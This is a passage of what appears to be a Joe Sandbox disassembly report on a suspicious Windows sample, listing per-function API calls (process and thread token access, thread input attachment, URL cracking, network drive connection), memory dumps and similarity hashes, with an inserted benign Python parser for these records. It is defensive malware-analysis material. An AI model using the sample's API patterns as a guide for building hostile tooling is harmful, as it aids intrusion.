                                      • Associated: 00000000.00000002.2026430792.00000000009E2000.00000004.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_880000_SAL987656700.jbxd
                                      Similarity
                                      • API ID: CounterPerformanceQuerySleep
                                      • String ID:
                                      • API String ID: 2875609808-0
                                      • Opcode ID: 2ac21fd5ae344c5fdc3d101ad3f253a98fc9d75369fcf2204be0aa1bb5427ee4
                                      • Instruction ID: 997ffddad1a763cb1ad929724018e4092ba1dd1c34f7e8734a90f4c77071fddf
                                      • Opcode Fuzzy Hash: 2ac21fd5ae344c5fdc3d101ad3f253a98fc9d75369fcf2204be0aa1bb5427ee4
                                      • Instruction Fuzzy Hash: CF113C71D4565DEBCF00AFE5E9986EFBB78FF0A721F104085D941B2141DB305550EB51
                                      APIs
                                      • SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,?), ref: 008E2DC5
                                      • GetWindowThreadProcessId.USER32(?,00000000), ref: 008E2DD6
                                      • GetCurrentThreadId.KERNEL32 ref: 008E2DDD
                                      • AttachThreadInput.USER32(00000000,?,00000000,00000000), ref: 008E2DE4
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2026164990.0000000000881000.00000040.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                      • Associated: 00000000.00000002.2026144810.0000000000880000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2026164990.0000000000942000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2026164990.000000000094C000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2026164990.000000000095A000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2026164990.00000000009DB000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2026418762.00000000009E1000.00000080.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2026430792.00000000009E2000.00000004.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_880000_SAL987656700.jbxd
                                      Similarity
                                      • API ID: Thread$AttachCurrentInputMessageProcessSendTimeoutWindow
                                      • String ID:
                                      • API String ID: 2710830443-0
                                      • Opcode ID: ebac3ab11af8f663194d7d885039408a0384becfd9f53f368fbd6afbddc0d731
                                      • Instruction ID: 6f93b8a646daf39b2559caf7dfc3542c751f58e9bc85b43e9a684abaea3bdd08
                                      • Opcode Fuzzy Hash: ebac3ab11af8f663194d7d885039408a0384becfd9f53f368fbd6afbddc0d731
                                      • Instruction Fuzzy Hash: 28E06DB17992287AD7201B639C0DEEB3E6CFB43BA1F404215B205D1080DAA08840D6B0
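The records above all follow one layout: an APIs list giving each call's module, arguments and code address (with "Part of subcall function" lines for calls made one level down), the memory dump the function was lifted from, and the Similarity identifiers (API ID, API String ID, Opcode ID, Instruction ID and the two fuzzy hashes) that let a function be matched against other reports. The parser below is an added example, not part of the Joe Sandbox report or of its tooling; it turns such records into structured data so API chains, dump addresses and Opcode IDs can be pivoted on programmatically. The sample text is constructed from two of the records on this page, and the "Download File" suffix it strips is the link label the page export glued onto each Associated line.

```python
"""Parse Joe Sandbox disassembly 'Similarity' records into structured data.

Added example: not part of the Joe Sandbox report or its tooling. The
record layout is taken from the page; the SAMPLE text is constructed from
two of its records so the parser can run offline.
"""
import re
from typing import Dict, List, Optional

SAMPLE = """\
APIs
• GetCurrentProcess.KERNEL32(0000000A,00000004), ref: 008E14FF
• OpenProcessToken.ADVAPI32(00000000), ref: 008E1506
• CloseHandle.KERNEL32(00000004), ref: 008E1520
• CreateProcessWithLogonW.ADVAPI32(?,?,?,00000000,00000000,?,?,00000000,?,?,?), ref: 008E154F
Memory Dump Source
• Source File: 00000000.00000002.2026164990.0000000000881000.00000040.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
• Associated: 00000000.00000002.2026144810.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_880000_SAL987656700.jbxd
Similarity
• API ID: Process$CloseCreateCurrentHandleLogonOpenTokenWith
• String ID:
• API String ID: 2621361867-0
• Opcode ID: 4cebfa33414c8e0c9f468e95ef703bdf2bf5275dba6cd0b0b408a25422208a7c
• Instruction Fuzzy Hash: A2115CB260424DABDF118F94DD49BDE7BA9FF49708F048014FA05E21A0C3718E61EB60
APIs
• GetWindowLongW.USER32(?,000000F0), ref: 00917D0B
• SetWindowLongW.USER32(00000000,000000F0,?), ref: 00917D2A
• SetWindowLongW.USER32(00000000,000000EC,000000FF), ref: 00917D42
• SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,?,?,?,?,?,?,?,?,008FB7AD,00000000), ref: 00917D6B
  • Part of subcall function 00899BA1: GetWindowLongW.USER32(00000000,000000EB), ref: 00899BB2
Memory Dump Source
• Source File: 00000000.00000002.2026164990.0000000000881000.00000040.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
Similarity
• API ID: Window$Long
• String ID:
• API String ID: 847901565-0
• Opcode ID: 91c9e6096b34af5c2a69209ce74ea5cd986a6f7d91ed026f2d955bbad136026e
• Instruction Fuzzy Hash: 9311C07531861AAFCB109F68EC04AE67BA9AF45364F158724F835C72F0D7308990DB90
"""

# "• [Part of subcall function XXXX: ]Name.MODULE[(args)], ref: ADDR"
_API_RE = re.compile(
    r"^•?\s*"
    r"(?:Part of subcall function ([0-9A-Fa-f]+):\s*)?"
    r"([\w:]+?)\.([A-Z0-9]+)"      # Name.MODULE (names may contain '::')
    r"(?:\(([^)]*)\))?"            # optional argument list
    r",?\s*ref:\s*([0-9A-Fa-f]+)$"
)
_META_RE = re.compile(r"^•\s*([^:]+?):\s*(.*)$")
_SECTION_HEADERS = {"APIs", "Memory Dump Source", "Joe Sandbox IDA Plugin", "Similarity"}
_RESIDUE = "Download File"  # link label the page export glued onto Associated lines


def _parse_api(m: re.Match) -> Dict:
    subcall, name, module, args, ref = m.groups()
    return {
        "name": name,
        "module": module,
        "args": [a.strip() for a in args.split(",")] if args else [],
        "ref": int(ref, 16),
        "subcall_of": subcall.upper() if subcall else None,
    }


def parse_records(text: str) -> List[Dict]:
    """Split the text at each 'APIs' header and parse one record per function."""
    records: List[Dict] = []
    cur: Optional[Dict] = None
    for raw in text.splitlines():
        line = raw.strip()
        if not line:
            continue
        if line == "APIs":
            cur = {"apis": [], "associated": []}
            records.append(cur)
            continue
        if line in _SECTION_HEADERS or cur is None:
            continue
        m = _API_RE.match(line)
        if m:
            cur["apis"].append(_parse_api(m))
            continue
        m = _META_RE.match(line)
        if not m:
            continue
        key, value = m.group(1), m.group(2).strip()
        if key == "Source File":
            # "<dump>.sdmp, Offset: 00880000, based on PE: true"
            parts = [p.strip() for p in value.split(",")]
            cur["source_file"] = parts[0]
            for p in parts[1:]:
                k, _, v = p.partition(":")
                if k.strip() == "Offset":
                    cur["offset"] = int(v.strip(), 16)
                elif k.strip() == "based on PE":
                    cur["based_on_pe"] = v.strip().lower() == "true"
        elif key == "Associated":
            if value.endswith(_RESIDUE):
                value = value[: -len(_RESIDUE)].rstrip()
            cur["associated"].append(value)
        else:
            # "API String ID" -> api_string_id; empty values (String ID:) become None
            cur[key.lower().replace(" ", "_")] = value or None
    return records


def api_chain(record: Dict, include_subcalls: bool = False) -> List[str]:
    """API names in code-address order; subcall lines only when asked for."""
    calls = [c for c in record["apis"] if include_subcalls or c["subcall_of"] is None]
    return [c["name"] for c in sorted(calls, key=lambda c: c["ref"])]


def records_calling(records: List[Dict], api_name: str) -> List[int]:
    """Indices of records whose function (or its subcalls) invokes api_name."""
    return [i for i, r in enumerate(records) if any(c["name"] == api_name for c in r["apis"])]


def index_by(records: List[Dict], key: str) -> Dict[Optional[str], List[int]]:
    """Group record indices by a Similarity field, e.g. 'opcode_id' or 'api_id'."""
    idx: Dict[Optional[str], List[int]] = {}
    for i, r in enumerate(records):
        idx.setdefault(r.get(key), []).append(i)
    return idx


if __name__ == "__main__":
    for rec in parse_records(SAMPLE):
        print(rec.get("api_id"), "->", " > ".join(api_chain(rec)), "@", rec["source_file"])
```

Run it against a saved copy of the report text to get one dictionary per function; `index_by(records, "opcode_id")` groups functions by the exact-match identifier, which is the field to pivot on first across reports, since the fuzzy hashes need a similarity comparison rather than equality.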
                                      APIs
                                        • Part of subcall function 00899639: ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,00000000), ref: 00899693
                                        • Part of subcall function 00899639: SelectObject.GDI32(?,00000000), ref: 008996A2
                                        • Part of subcall function 00899639: BeginPath.GDI32(?), ref: 008996B9
                                        • Part of subcall function 00899639: SelectObject.GDI32(?,00000000), ref: 008996E2
                                      • MoveToEx.GDI32(?,00000000,00000000,00000000), ref: 00918887
                                      • LineTo.GDI32(?,?,?), ref: 00918894
                                      • EndPath.GDI32(?), ref: 009188A4
                                      • StrokePath.GDI32(?), ref: 009188B2
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2026164990.0000000000881000.00000040.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                      • Associated: 00000000.00000002.2026144810.0000000000880000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2026164990.0000000000942000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2026164990.000000000094C000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2026164990.000000000095A000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2026164990.00000000009DB000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2026418762.00000000009E1000.00000080.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2026430792.00000000009E2000.00000004.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_880000_SAL987656700.jbxd
                                      Similarity
                                      • API ID: Path$ObjectSelect$BeginCreateLineMoveStroke
                                      • String ID:
                                      • API String ID: 1539411459-0
                                      • Opcode ID: 5e4d0faef48b1b74809e19ddca5156b6eeafee34f922f443d9054589cd49a976
                                      • Instruction ID: 141f8a60f750cbd382cf04169ab2a72871984df842ea86a0301719b73d36d1ad
                                      • Opcode Fuzzy Hash: 5e4d0faef48b1b74809e19ddca5156b6eeafee34f922f443d9054589cd49a976
                                      • Instruction Fuzzy Hash: B5F05E36299258FADF126F94AC0AFCE3F59AF0A311F048040FA11650E1C7755551EFE9
                                      APIs
                                      • GetSysColor.USER32(00000008), ref: 008998CC
                                      • SetTextColor.GDI32(?,?), ref: 008998D6
                                      • SetBkMode.GDI32(?,00000001), ref: 008998E9
                                      • GetStockObject.GDI32(00000005), ref: 008998F1
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2026164990.0000000000881000.00000040.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                      • Associated: 00000000.00000002.2026144810.0000000000880000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2026164990.0000000000942000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2026164990.000000000094C000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2026164990.000000000095A000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2026164990.00000000009DB000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2026418762.00000000009E1000.00000080.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2026430792.00000000009E2000.00000004.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_880000_SAL987656700.jbxd
                                      Similarity
                                      • API ID: Color$ModeObjectStockText
                                      • String ID:
                                      • API String ID: 4037423528-0
                                      • Opcode ID: 9c08eb4720aae3c1676de20aa383c64b8a7c3d1676083ff6a94bac95afb9519d
                                      • Instruction ID: 217bf6244ecd7abfb4b172e6c479a942d77dac9fa432db72c5ae3f8d6b558f6a
                                      • Opcode Fuzzy Hash: 9c08eb4720aae3c1676de20aa383c64b8a7c3d1676083ff6a94bac95afb9519d
                                      • Instruction Fuzzy Hash: B1E03971398280AADB215B78AC09BE83F21EB12336F14C21AF6FA980E1C7714640EB11
                                      APIs
                                      • GetCurrentThread.KERNEL32 ref: 008E1634
                                      • OpenThreadToken.ADVAPI32(00000000,?,?,?,008E11D9), ref: 008E163B
                                      • GetCurrentProcess.KERNEL32(00000028,?,?,?,?,008E11D9), ref: 008E1648
                                      • OpenProcessToken.ADVAPI32(00000000,?,?,?,008E11D9), ref: 008E164F
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2026164990.0000000000881000.00000040.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                      • Associated: 00000000.00000002.2026144810.0000000000880000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2026164990.0000000000942000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2026164990.000000000094C000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2026164990.000000000095A000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2026164990.00000000009DB000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2026418762.00000000009E1000.00000080.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2026430792.00000000009E2000.00000004.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_880000_SAL987656700.jbxd
                                      Similarity
                                      • API ID: CurrentOpenProcessThreadToken
                                      • String ID:
                                      • API String ID: 3974789173-0
                                      • Opcode ID: 39b2b260552890a0cf351f2f53790a5dc30c281b7b38b186168d4f9589befcbc
                                      • Instruction ID: b40df5f69bf02d5d89ae1d577b5d7e370fe622c4611050a747db7fc1145345a9
                                      • Opcode Fuzzy Hash: 39b2b260552890a0cf351f2f53790a5dc30c281b7b38b186168d4f9589befcbc
                                      • Instruction Fuzzy Hash: DDE08CB2796221EBDB201FA1AE0DBC63B7CFF59792F14CC08F245DA090E6348541DB60
                                      APIs
                                      • GetDesktopWindow.USER32 ref: 008DD858
                                      • GetDC.USER32(00000000), ref: 008DD862
                                      • GetDeviceCaps.GDI32(00000000,0000000C), ref: 008DD882
                                      • ReleaseDC.USER32(?), ref: 008DD8A3
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2026164990.0000000000881000.00000040.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                      • Associated: 00000000.00000002.2026144810.0000000000880000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2026164990.0000000000942000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2026164990.000000000094C000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2026164990.000000000095A000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2026164990.00000000009DB000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2026418762.00000000009E1000.00000080.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2026430792.00000000009E2000.00000004.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_880000_SAL987656700.jbxd
                                      Similarity
                                      • API ID: CapsDesktopDeviceReleaseWindow
                                      • String ID:
                                      • API String ID: 2889604237-0
                                      • Opcode ID: 59795fb6c2780f58be0b9028c99e835bb0f029729169298040b78b73ea43d2fc
                                      • Instruction ID: d79da5f5b72a7a31798628f6482209af1ba55f1b975e74dc15b0ee80cd737485
                                      • Opcode Fuzzy Hash: 59795fb6c2780f58be0b9028c99e835bb0f029729169298040b78b73ea43d2fc
                                      • Instruction Fuzzy Hash: D8E01AB4A54209EFCF41AFA0D90C6ADBBB1FB08350F14D419E80AE7250CB385901FF50
                                      APIs
                                      • GetDesktopWindow.USER32 ref: 008DD86C
                                      • GetDC.USER32(00000000), ref: 008DD876
                                      • GetDeviceCaps.GDI32(00000000,0000000C), ref: 008DD882
                                      • ReleaseDC.USER32(?), ref: 008DD8A3
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2026164990.0000000000881000.00000040.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                      • Associated: 00000000.00000002.2026144810.0000000000880000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2026164990.0000000000942000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2026164990.000000000094C000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2026164990.000000000095A000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2026164990.00000000009DB000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2026418762.00000000009E1000.00000080.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2026430792.00000000009E2000.00000004.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_880000_SAL987656700.jbxd
                                      Similarity
                                      • API ID: CapsDesktopDeviceReleaseWindow
                                      • String ID:
                                      • API String ID: 2889604237-0
                                      • Opcode ID: 6c0c7c8951824d50301b2035849ad67b642ccfc26cd2beefdc4bed9fd27f66b2
                                      • Instruction ID: 92c47614feaadd4f28ad3e7c0e5db1c14b1aeff1449fd72a969ccb66713a8629
                                      • Opcode Fuzzy Hash: 6c0c7c8951824d50301b2035849ad67b642ccfc26cd2beefdc4bed9fd27f66b2
                                      • Instruction Fuzzy Hash: D9E012B4E58209EFCF40AFA0D80C6ADBBB1FB08350B149008E90AE7250CB385A01EF50
                                      APIs
                                        • Part of subcall function 00887620: _wcslen.LIBCMT ref: 00887625
                                      • WNetUseConnectionW.MPR(00000000,?,0000002A,00000000,?,?,0000002A,?), ref: 008F4ED4
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2026164990.0000000000881000.00000040.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                      • Associated: 00000000.00000002.2026144810.0000000000880000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2026164990.0000000000942000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2026164990.000000000094C000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2026164990.000000000095A000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2026164990.00000000009DB000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2026418762.00000000009E1000.00000080.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2026430792.00000000009E2000.00000004.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_880000_SAL987656700.jbxd
                                      Similarity
                                      • API ID: Connection_wcslen
                                      • String ID: *$LPT
                                      • API String ID: 1725874428-3443410124
                                      • Opcode ID: cf0c614a89c89fbd42bb7df2729c8491c51d8648e8a714787366f1aa53018498
                                      • Instruction ID: 16782eab6013530a53e7013d0b613b51c8a51ece05393b0f7aa9838de994f4d1
                                      • Opcode Fuzzy Hash: cf0c614a89c89fbd42bb7df2729c8491c51d8648e8a714787366f1aa53018498
                                      • Instruction Fuzzy Hash: 09913D75A002089FCB14DF68C484EAABBF1FF45318F189099E54ADB362DB31ED85CB91
                                      APIs
                                      • __startOneArgErrorHandling.LIBCMT ref: 008AE30D
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2026164990.0000000000881000.00000040.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                      • Associated: 00000000.00000002.2026144810.0000000000880000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2026164990.0000000000942000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2026164990.000000000094C000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2026164990.000000000095A000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2026164990.00000000009DB000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2026418762.00000000009E1000.00000080.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2026430792.00000000009E2000.00000004.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_880000_SAL987656700.jbxd
                                      Similarity
                                      • API ID: ErrorHandling__start
                                      • String ID: pow
                                      • API String ID: 3213639722-2276729525
                                      • Opcode ID: 93df5703e5282d8914edb16d00e61be9127704b7a154a2bdda008838fbbe9309
                                      • Instruction ID: 683e303d02fe61074f8336874baa3e4e6c8cf4e25666e10737478d289acc5c69
                                      • Opcode Fuzzy Hash: 93df5703e5282d8914edb16d00e61be9127704b7a154a2bdda008838fbbe9309
                                      • Instruction Fuzzy Hash: D1515B61A1C70696EB257718C9013F93BA4FF81B80F344DA8E096C27ADEB348C959A46
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2026164990.0000000000881000.00000040.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                      • Associated: 00000000.00000002.2026144810.0000000000880000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2026164990.0000000000942000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2026164990.000000000094C000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2026164990.000000000095A000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2026164990.00000000009DB000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2026418762.00000000009E1000.00000080.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2026430792.00000000009E2000.00000004.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_880000_SAL987656700.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: #
                                      • API String ID: 0-1885708031
                                      • Opcode ID: ef133016418862e164d5043b46ce60ea9f8e52c2eeaba700eb0a6fccd44149d0
                                      • Instruction ID: 4a9939e7fc3a79cb8b0b3846cec73a964f71782679485ecf3b84b62771c5d08b
                                      • Opcode Fuzzy Hash: ef133016418862e164d5043b46ce60ea9f8e52c2eeaba700eb0a6fccd44149d0
                                      • Instruction Fuzzy Hash: 7F51FF7590424ADFDF25FFA8C481ABA7BA8FF15310F284156F891DF290DA309D42CBA1
                                      APIs
                                      • Sleep.KERNEL32(00000000), ref: 0089F2A2
                                      • GlobalMemoryStatusEx.KERNEL32(?), ref: 0089F2BB
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2026164990.0000000000881000.00000040.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                      • Associated: 00000000.00000002.2026144810.0000000000880000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2026164990.0000000000942000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2026164990.000000000094C000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2026164990.000000000095A000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2026164990.00000000009DB000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2026418762.00000000009E1000.00000080.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2026430792.00000000009E2000.00000004.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_880000_SAL987656700.jbxd
                                      Similarity
                                      • API ID: GlobalMemorySleepStatus
                                      • String ID: @
                                      • API String ID: 2783356886-2766056989
                                      • Opcode ID: 9ab099040d4e7553394bcd03be8ac6e302310781c93a603af1a57842c80bfd0c
                                      • Instruction ID: d50aa858f7faef60eaef66e4d012281af54e627abd0c23015e3968af73d6cbf7
                                      • Opcode Fuzzy Hash: 9ab099040d4e7553394bcd03be8ac6e302310781c93a603af1a57842c80bfd0c
                                      • Instruction Fuzzy Hash: FC51397141C7449BE320AF14E886BABB7F8FF84304F91885DF299911A5EB708529CB67
                                      APIs
                                      • CharUpperBuffW.USER32(?,?,?,00000003,?,?), ref: 009057E0
                                      • _wcslen.LIBCMT ref: 009057EC
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2026164990.0000000000881000.00000040.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                      • Associated: 00000000.00000002.2026144810.0000000000880000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2026164990.0000000000942000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2026164990.000000000094C000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2026164990.000000000095A000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2026164990.00000000009DB000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2026418762.00000000009E1000.00000080.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2026430792.00000000009E2000.00000004.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_880000_SAL987656700.jbxd
                                      Similarity
                                      • API ID: BuffCharUpper_wcslen
                                      • String ID: CALLARGARRAY
                                      • API String ID: 157775604-1150593374
                                      • Opcode ID: 747f20dc73f4e618c03cfb7fee81bd27eb4b9fc63a0d7823437f4121b4647bc6
                                      • Instruction ID: aad8f736a9b8ea95609a5785acd6d032fdea81a7fe842f6e3359c32b28ff76d9
                                      • Opcode Fuzzy Hash: 747f20dc73f4e618c03cfb7fee81bd27eb4b9fc63a0d7823437f4121b4647bc6
                                      • Instruction Fuzzy Hash: AB419F71A006099FCB14EFA9C8819BEBBF9FF59314F158069E905E72A1E7309D81CF91
                                      APIs
                                      • _wcslen.LIBCMT ref: 008FD130
                                      • InternetCrackUrlW.WININET(?,00000000,00000000,0000007C), ref: 008FD13A
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2026164990.0000000000881000.00000040.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                      • Associated: 00000000.00000002.2026144810.0000000000880000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2026164990.0000000000942000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2026164990.000000000094C000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2026164990.000000000095A000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2026164990.00000000009DB000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2026418762.00000000009E1000.00000080.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2026430792.00000000009E2000.00000004.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_880000_SAL987656700.jbxd
                                      Similarity
                                      • API ID: CrackInternet_wcslen
                                      • String ID: |
                                      • API String ID: 596671847-2343686810
                                      • Opcode ID: 04aab07dd3a5761484528a9c0e352b2025776c56fbe2a552afae2413761b83fc
                                      • Instruction ID: 59f5c339be94f8e4ce18100d05ee0c9578b324890aa2df0e427ee09960bcb0f2
                                      • Opcode Fuzzy Hash: 04aab07dd3a5761484528a9c0e352b2025776c56fbe2a552afae2413761b83fc
                                      • Instruction Fuzzy Hash: 0F311A71D00219ABDF15EFA8CC85AEEBFBAFF05300F100019F915E6162E731AA56DB61
                                      APIs
                                      • DestroyWindow.USER32(?,?,?,?), ref: 00913621
                                      • MoveWindow.USER32(?,?,?,?,?,00000001,?,?,?), ref: 0091365C
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2026164990.0000000000881000.00000040.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                      • Associated: 00000000.00000002.2026144810.0000000000880000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2026164990.0000000000942000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2026164990.000000000094C000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2026164990.000000000095A000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2026164990.00000000009DB000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2026418762.00000000009E1000.00000080.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2026430792.00000000009E2000.00000004.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_880000_SAL987656700.jbxd
                                      Similarity
                                      • API ID: Window$DestroyMove
                                      • String ID: static
                                      • API String ID: 2139405536-2160076837
                                      • Opcode ID: cdf5882d0baaee248dc24551dfdb8654dde7eca8e5c48e904464cbe30760e916
                                      • Instruction ID: 7991707a95feb25cb0a1634d15c2d2a7601fbb216da6627133ab3907b8287089
                                      • Opcode Fuzzy Hash: cdf5882d0baaee248dc24551dfdb8654dde7eca8e5c48e904464cbe30760e916
                                      • Instruction Fuzzy Hash: 8E318E71210608AADB109F28DC41AFB73BDFF88764F108619F9A5D7280DA30AD91D760
                                      APIs
                                      • SendMessageW.USER32(?,00001132,00000000,?), ref: 0091461F
